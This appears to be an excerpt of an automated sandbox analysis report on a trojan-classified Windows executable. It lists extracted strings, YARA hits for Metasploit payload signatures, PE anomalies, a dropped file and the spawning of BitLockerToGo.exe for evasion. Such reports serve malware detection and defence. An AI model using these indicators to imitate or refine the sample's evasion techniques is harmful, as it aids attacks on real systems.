Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://.jpg
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://earth.google.com/kml/2.0
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://earth.google.com/kml/2.1
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://earth.google.com/kml/2.2
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://html4/loose.dtd
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengis.net/gml
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengis.net/gml/3.2
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengis.net/gml/3.3/exr
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1872396916.000000C00002C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.opengis.net/kml/2.2
Source: LisectAVT_2403002A_326.exe String found in binary or memory: http://www.topografix.com/GPX/1/1
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://api.loganalytics.iohttps://api.loganalytics.ushttps://datalake.azure.net/https://graph.micro
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://auth.docker.com/
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://batch.cloudapi.de/https://gallery.azure.com/https://graph.cloudapi.de/https://graph.windows.
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://cosmos.azure.comhttps://vault.azure.net/iam.us-gov.amazonaws.comidna:
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://database.chinacloudapi.cn/https://gallery.usgovcloudapi.net/https://login.microsoftonline.co
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://github.com/uber-go/dig/issues/new
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://manage.windowsazure.com/publishsettings/indexillegal
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexinternal
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://onsi.github.io/gomega/#adjusting-output
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://onsi.github.io/gomega/#eventually
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://ossrdbms-aad.database.chinacloudapi.cningest.timestream-fips.us-east-1.amazonaws.comingest.t
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://vault.azure.cn/https://vault.azure.netimage/x-portable-anymapimage/x-portable-bitmapimage/x-
Source: LisectAVT_2403002A_326.exe String found in binary or memory: https://vault.azure.cniam-fips.amazonaws.comidna:

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1889291210.000000C000B3A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1889291210.000000C000AEE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1889291210.000000C000BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Detected potential crypto function
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B961A0 0_2_000000C000B961A0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F992 0_2_000000C000B9F992
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B978C0 0_2_000000C000B978C0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B91500 0_2_000000C000B91500
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F1DA 0_2_000000C000B9F1DA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F60E 0_2_000000C000B9F60E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9FBB9 0_2_000000C000B9FBB9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F33B 0_2_000000C000B9F33B
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F731 0_2_000000C000B9F731
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B96710 0_2_000000C000B96710
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B86C7E 0_2_000000C000B86C7E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B90490 0_2_000000C000B90490
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B9F489 0_2_000000C000B9F489
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B97FE0 0_2_000000C000B97FE0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F992 0_2_000000C000D2F992
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D261A0 0_2_000000C000D261A0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D21500 0_2_000000C000D21500
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D278C0 0_2_000000C000D278C0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F60E 0_2_000000C000D2F60E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F1DA 0_2_000000C000D2F1DA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2FBB9 0_2_000000C000D2FBB9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D26710 0_2_000000C000D26710
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F731 0_2_000000C000D2F731
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F33B 0_2_000000C000D2F33B
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D20490 0_2_000000C000D20490
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D2F489 0_2_000000C000D2F489
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D16C7E 0_2_000000C000D16C7E
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D27FE0 0_2_000000C000D27FE0
Found potential string decryption / allocating functions
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 030543B0 appears 316 times
PE file contains more sections than normal
Source: LisectAVT_2403002A_326.exe Static PE information: Number of sections : 12 > 10
Sample file is different than original file name gathered from version info
Source: LisectAVT_2403002A_326.exe Binary or memory string: OriginalFilename vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe, 00000000.00000000.1705218440.00007FF6AC316000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAlkom Engineering-Setup.exeP0 vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs LisectAVT_2403002A_326.exe
Source: LisectAVT_2403002A_326.exe Binary or memory string: OriginalFilenameAlkom Engineering-Setup.exeP0 vs LisectAVT_2403002A_326.exe
Yara signature match
Source: 00000000.00000002.1889291210.000000C000B3A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1889291210.000000C000AEE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1889291210.000000C000BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: LisectAVT_2403002A_326.exe Binary string: lande (la)NtSetSystemInformationNyiakeng_Puachue_HmongOccitan France (oc-FR)OleCreatePropertyFrameOromo Ethiopia (om-ET)Pakistan Standard TimeParaguay Standard TimePower PC little endianRegisterTypeLibForUserRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersRussian Russia (ru-RU)SafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSanskrit India (sa-IN)Sao Tome Standard TimeSesotho Sa Leboa (nso)SetupDiEnumDriverInfoWSetupDiGetClassDevsExWSomali Somalia (so-SO)Spanish Mexico (es-MX)Spanish Panama (es-PA)Svalbard and Jan MayenSwedish Sweden (sv-SE)SynchronizedAfterSuiteTARGET_TYPE_ENUM_ENTRYTLS_AES_128_GCM_SHA256TLS_AES_256_GCM_SHA384Tasmania Standard TimeTrailNotFoundExceptionTrainingCenterDatabaseTurkish Turkey (tr-TR)Unsupported Media TypeUnsupportedCertificateWSAAsyncGetProtoByNameWSAGetOverlappedResultWSALookupServiceBeginAWSALookupServiceBeginWWSCWriteNameSpaceOrderWaitForMultipleObjectsWrong unwind opcode %dX-Content-Type-OptionsXXX_InternalExtensionsYiddish World (yi-001)Yoruba Nigeria (yo-NG)[client-transport %p] [server-transport %p] "<internal error: %v>"\Device\NamedPipe\msys
Source: LisectAVT_2403002A_326.exe Binary string: \Device\NamedPipe\cygwin
Source: classification engine Classification label: mal100.troj.evad.winEXE@3/0@0/0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe File created: C:\Users\Public\Libraries\ooabk.scif Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe File opened: C:\Windows\system32\af1c4147b56a0f0b20189c52106c7d67a33808e591b520fdac5a8ab1a60a54f9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: LisectAVT_2403002A_326.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: LisectAVT_2403002A_326.exe String found in binary or memory: google.golang.org/grpc@v1.62.1/internal/balancerload/load.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: O//9BNg/dpMnZW25KydO4wtVxWAIbho= depgithub.com/docker/docker-credential-helpersv0.7.0h1:xtCHsjxogADNZcdv1pKUHXryefjlVRqWqIhk/uXJp0A= depgithub.com/docker/go-connectionsv0.5.0h1:USnMq7hx7gwdVZq1L49hLXaFtUdTADjXGp+uj1Br63c= depgithub.com/edsrzf/mmap-gov1
Source: LisectAVT_2403002A_326.exe String found in binary or memory: net/addrselect.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: depgithub.com/docker/docker-credential-helpersv0.7.0h1:xtCHsjxogADNZcdv1pKUHXryefjlVRqWqIhk/uXJp0A=
Source: LisectAVT_2403002A_326.exe String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: LisectAVT_2403002A_326.exe String found in binary or memory: [38;5;28m^(\d{6})?$^976\d{2}$^980\d{2}$^986\d{2}$^987\d{2}$^988\d{2}$^BBND 1ZZ$^FIQQ 1ZZ$^PCRN 1ZZ$^SIQQ 1ZZ$^TKCA 1ZZ$^[\p{L}]+$_DATERANGE_GTSVECTOR_INT4RANGE_INT8RANGE_OIDVECTOR_REFCURSOR_REGCONFIG_TIMESTAMP_TINTERVAL_TSTZRANGE_reserved1af-south-1ap-south-1ap-south-2apigatewayappstream2arg %d: %watomicand8audio/3gppaudio/aiffaudio/flacaudio/midiaudio/mpegaudio/waveaudio/webmavx512bf16avx512gfniavx512ifmaavx512vaesavx512vbmiavx512vnniaws-globalaws-sdk-goaws-us-govazurecr.cnazurecr.ioazurecr.usbackgroundbackprime;backsimeq;big5-hkscsbigotimes;blockType(blockquotebuffer(%p)byte rangec2s.ic.govcenterdot;checkmark;cleanroomscloudfrontcloudhsmv2cloudtrailcn-north-1codecommitcodedeploycomparablecomplex128complexes;comprehendconnectioncreatetempcreditcardcsshiftjisdark-greendate-localdebug calldefinitiondependencydeprecateddevicefarmdialstringdnsapi.dlldotsquare;downarrow;dwmapi.dllecho replyeu-north-1eu-south-1eu-south-2event/nextexecerrdotexitThreadexp masterfigcaptionfloat32nanfloat64nanfont/woff2formactionformmethodformtargetgb_2312-80getsockoptgo_packagegoroutine greengrassgroup = %qgrpc.Recv.grpc.Sent.gtecsfieldgtrapprox;gtreqless;gvertneqq;healthlakeheartsuit;http-equivhttp_proxyhz-gb-2312image/avifimage/heicimage/heifimage/jpegimage/tiffimage/webpimpossibleinput_typeinspector2instanceofinvalid IPinvalidptriso-8859-1iso-8859-2iso-8859-3iso-8859-4iso-8859-5iso-8859-6iso-8859-7iso-8859-8iso-8859-9iso-ir-100iso-ir-101iso-ir-109iso-ir-110iso-ir-126iso-ir-127iso-ir-138iso-ir-144iso-ir-148iso-ir-149iso-ir-157iso8859-10iso8859-11iso8859-13iso8859-14iso8859-15iso_8859-1iso_8859-2iso_8859-3iso_8859-4iso_8859-5iso_8859-6iso_8859-7iso_8859-8iso_8859-9keep-alivekeySplineskeysplineslabel=<%v>leftarrow;lesseqgtr;light-graylinux/mipslocal-addrlocalhost:ltecsfieldlvertneqq;mSpanInUseme-south-1mediagroupmediastoremodels.lexmonitoringmultipart-ncrypt.dllnetbsd/386netbsd/armngeqslant;nleqslant;notifyListnovalidatenparallel;nrpostgresnshortmid;nsubseteq;nsupseteq;numOctavesnumoctavesobjectpathone_outputoneof_declowner diedpathLengthpathlengthpick_firstpitchfork;portal.ssoppt/_rels/ppt/media/ppt/theme/printasciiprofInsertquicksightradiogrouprationals;res binderres masterresumptionroundrobinrune <nil>runelengthruntime: gs.state = s3-controlschedtracesemacquireset-cookiesetsockoptshort readskipping: slabinfo -socks bindspadesuit;spellcheckstackLargestartswithstream endstructonlysubseteqq;subsetneq;supportappsupseteqq;supsetneq;syntheticst.Kind == terminatedtext/plaintext/vcardtext/x-luatext/x-phptext/x-srttext/x-tcltextLengthtextlengththerefore;thinclienttime-localtracefree(tracegc()
Source: LisectAVT_2403002A_326.exe String found in binary or memory: .WithDeadline(.in-addr.arpa./log/filter.go/log/helper.go1907348632812595367431640625: extra text: <binary chunk><not Stringer>> closed by </ALREADY_EXISTSAccept-CharsetAfrikaans (af)Align 16-BytesAlign 32-BytesAlign 64-BytesAlign1024BytesAlign2048BytesAlign4096BytesAlign8192BytesAllemagne (l')Alsatian (gsw)American SamoaApplyFunction;Argentine (l')Australie (l')BLOCK_LENGTH_1BLOCK_LENGTH_2BadCertificateBermudes (les)BstrFromVectorBulgarian (bg)CET CompatibleCLICOLOR_FORCECertCloseStoreCherokee (chr)Chunk AcceptedChunked uploadCoInitializeExCoUninitializeComputerNameExContent-LengthControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCreateTypeLib2CryptGenRandomC
Source: LisectAVT_2403002A_326.exe String found in binary or memory: [0m[%04d]%s %-44s ^(9694[1-4])([ \-]\d{4})?$^([-+._a-zA-Z0-9]{1,32}|.)^[-+]?[0-9]+(?:\.[0-9]+)?$^maxstringlength\((\d+)\)$^minstringlength\((\d+)\)$_html_template_attrescaper_html_template_htmlescaperaddress type not supportedaos.ap-northeast-1.api.awsaos.ap-northeast-2.api.awsaos.ap-northeast-3.api.awsaos.ap-southeast-1.api.awsaos.ap-southeast-2.api.awsaos.ap-southeast-3.api.awsaos.ap-southeast-4.api.awsapplication/vnd.adobe.xfdfapplication/vnd.ms-outlookapplication/x-ms-installerapplication/x-unix-archiveappmesh.af-south-1.api.awsappmesh.ap-south-1.api.awsappmesh.eu-north-1.api.awsappmesh.eu-south-1.api.awsappmesh.me-south-1.api.awsasn1: invalid UTF-8 stringautorest/adal/devicetoken:bad certificate hash valuebare " in non-quoted-fieldbase 128 integer too largebatch.{region}.{dnsSuffix}binary.Read: invalid type bytes <start>-<end>/<size>call from functioncannot marshal DNS messageccBalancerWrapper: closingce.us-east-1.amazonaws.comchacha20: counter overflowchacha20: wrong nonce sizecloudapp.microsoftazure.decloudapp.usgovcloudapi.netcontainer nesting too deepcorrupted semaphore ticketcriterion lacks equal signcryptobyte: internal errordatabase.usgovcloudapi.netdatazone.ap-east-1.api.awsdatazone.ca-west-1.api.awsdatazone.eu-west-1.api.awsdatazone.eu-west-2.api.awsdatazone.eu-west-3.api.awsdatazone.sa-east-1.api.awsdatazone.us-east-1.api.awsdatazone.us-east-2.api.awsdatazone.us-west-1.api.awsdatazone.us-west-2.api.awsduplicate pseudo-header %qduplicate stream initiatedeks-auth.ap-east-1.api.awseks-auth.ca-west-1.api.awseks-auth.eu-west-1.api.awseks-auth.eu-west-2.api.awseks-auth.eu-west-3.api.awseks-auth.sa-east-1.api.awseks-auth.us-east-1.api.awseks-auth.us-east-2.api.awseks-auth.us-west-1.api.awseks-auth.us-west-2.api.awsencountered a cycle via %sentersyscall inconsistent expected complex; found %sexpected integer; found %sfailed to find ConnectEx: forEachP: P did not run fnfound undefined tag handleframe_priority_zero_streamframe_windowupdate_bad_lenfreedefer with d.fn != nilglue.us-gov-east-1.api.awsglue.us-gov-west-1.api.awsgob: local interface type google.golang.org/genprotogoogle/protobuf/type.protogrpc-previous-rpc-attemptshexcolor|rgb|rgba|hsl|hslahttp2: Framer %p: wrote %vhttp2: invalid Host headerhttps://batch.cloudapi.de/https://gallery.azure.com/https://graph.cloudapi.de/https://graph.windows.net/https://storage.azure.com/id (%v) <= evictCount (%v)importexport.amazonaws.cominteger overflow on token invalid UTF-8 byte: 0x%02xinvalid argument to Int31ninvalid argument to Int63ninvalid character sequenceinvalid nil source messageinvalid port %q after hostinvalid request descriptorinvalid server name formatinvalid value; expected %slog: cannot create log: %vlz4: option not applicablelzma: dictCap out of rangemalformed HTTP status codemalformed chunked encodingmalformed grpc-timeout: %vmariadb.database.azure.commobile prefix solicitationmysql.database.cloudapi.dename not unique on networknegative idle mark workersnegative literal i
Source: LisectAVT_2403002A_326.exe String found in binary or memory: wan (Province de Chine)TrailAlreadyExistsExceptionTsonga South Africa (ts-ZA)UnauthorizedClientExceptionWELL_KNOWN_TYPE_UNSPECIFIEDX-Amz-Expected-Bucket-Owner^(?:[^%]|%[0-9A-Fa-f]{2})*$^00[679]\d{2}([ \-]\d{4})?$^BC1[02-9AC-HJ-NP-Z]{7,76}$^\d{3}[- ]?\d{2}[- ]?\d{4}$^bc1[02-9ac-hj-np-z]{7,76}$_html_template_jsstrescaper_html_template_jsvalescaperaccess-control-allow-originaddress not a stack addressaddress of entry point is 0after object key:value pairapplication/gzip-compressedapplication/pkcs7-signatureapplication/x-7z-compressedapplication/x-installshieldathena.ca-central-1.api.awsathena.eu-central-1.api.awsathena.eu-central-2.api.awsathena.il-central-1.api.awsathena.me-central-1.api.awsbad data: undefined type %sber2der: Invalid BER formatber2der: input ber is emptybinary.Write: invalid type boringcrypto: not availablecan't index item of type %scan't invoke an untyped nilcan't slice item of type %scannot register a nil Codecchannel number out of rangecipher: incorrect length IVcodecatalyst.global.api.awscommunication error on sendconfig.{region}.{dnsSuffix}connection error: desc = %qcorrupt input: weights zerocould not find QPC syscallscould not find expected ':'cryptobyte: length overflowcurrent time %s is after %sdatazone.af-south-1.api.awsdatazone.ap-south-1.api.awsdatazone.ap-south-2.api.awsdatazone.eu-north-1.api.awsdatazone.eu-south-1.api.awsdatazone.eu-south-2.api.awsdatazone.me-south-1.api.awsdbus.Store: length mismatchdbus: authentication faileddecode can't handle type %sdeprecated randomized filesdocuments.microsoftazure.deed25519: verification erroreks-auth.af-south-1.api.awseks-auth.ap-south-1.api.awseks-auth.ap-south-2.api.awseks-auth.eu-north-1.api.awseks-auth.eu-south-1.api.awseks-auth.eu-south-2.api.awseks-auth.me-south-1.api.awsexpand slice: cannot changeexpected a digit but got %qexpected low surrogate areaexpression nests too deeplyfailed to set sweep barrierfips-verification-us-east-1fips-verification-us-east-2fips-verification-us-west-1fips-verification-us-west-2frame_pushpromise_pad_shortframe_rststream_zero_streamfse decompress returned: %wgcstopm: not waiting for gcglobal.health.amazonaws.comgrowslice: len out of rangehkdf: entropy limit reachedhttp chunk length too largehttp2: response body closedhttp: invalid Cookie.Domainhttps://api.loganalytics.iohttps://api.loganalytics.ushttps://datalake.azure.net/https://graph.microsoft.us/icmp node information queryincomplete UTF-16 characterinput overflows the modulusinsufficient security levelinternal lockOSThread errorinvalid ASN.1 from SignASN1invalid HTTP header name %qinvalid Message.Mutable on invalid P224 point encodinginvalid P256 point encodinginvalid P384 point encodinginvalid P521 point encodinginvalid argument to Shuffleinvalid character <<%c>> %sinvalid dependent stream IDinvalid leading UTF-8 octetinvalid profile bucket typeinvalid schema or transportinvalid signature algorithminvalid struct key type: %vinvalid type for comparisoninvalid type name length %dkey was
Source: LisectAVT_2403002A_326.exe String found in binary or memory: The `Content-Length` header must be zero and the body must be empty.The upload is to the registry. The upload must be restarted.^[ABCEGHJKLMNPRSTVXY]\d[ABCEGHJ-NPRSTV-Z][ ]?\d[ABCEGHJ-NPRSTV-Z]\d$big: invalid 2nd argument to Int.Jacobi: need odd integer but got %sbytes/string in stream must decode into slice/array of bytes, not %vcannot decode into nil map[int32]interface{} given stream length: %vcannot decode into nil map[uint8]interface{} given stream length: %vcomma-separated list of pattern=N settings for file-filtered loggingcrypto/hmac: hash generation function does not produce unique valuesdamaged Import Table information. ILT and/or IAT appear to be brokendbus.Store: type mismatch: map: cannot convert a value of %s into %sdbus.Store: type mismatch: slice: cannot store a value of %s into %sdecoding int array or slice: length exceeds input size (%d elements)embedded IPv4 address must replace the final 2 fields of the addressexpected SCALAR, SEQUENCE-START, MAPPING-START, or ALIAS, but got %vexpecting the prefix to be the "urn" string (whatever case) [col %d]extension %v does not implement protoreflect.ExtensionTypeDescriptorgo package net: built with netgo build tag; using Go's DNS resolver
Source: LisectAVT_2403002A_326.exe String found in binary or memory: net/addrselect.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
Source: LisectAVT_2403002A_326.exe String found in binary or memory: google.golang.org/grpc@v1.62.1/internal/balancerload/load.go
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe File read: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe "C:\Users\user\Desktop\LisectAVT_2403002A_326.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: opengl32.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: glu32.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll Jump to behavior
Source: LisectAVT_2403002A_326.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: LisectAVT_2403002A_326.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: LisectAVT_2403002A_326.exe Static file information: File size 23900169 > 1048576
Source: LisectAVT_2403002A_326.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x913e00
Source: LisectAVT_2403002A_326.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x162e00
Source: LisectAVT_2403002A_326.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc04c00
Source: LisectAVT_2403002A_326.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: LisectAVT_2403002A_326.exe, LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp
Contains functionality to dynamically determine API calls
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0306918C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0306918C
PE file contains sections with non-standard names
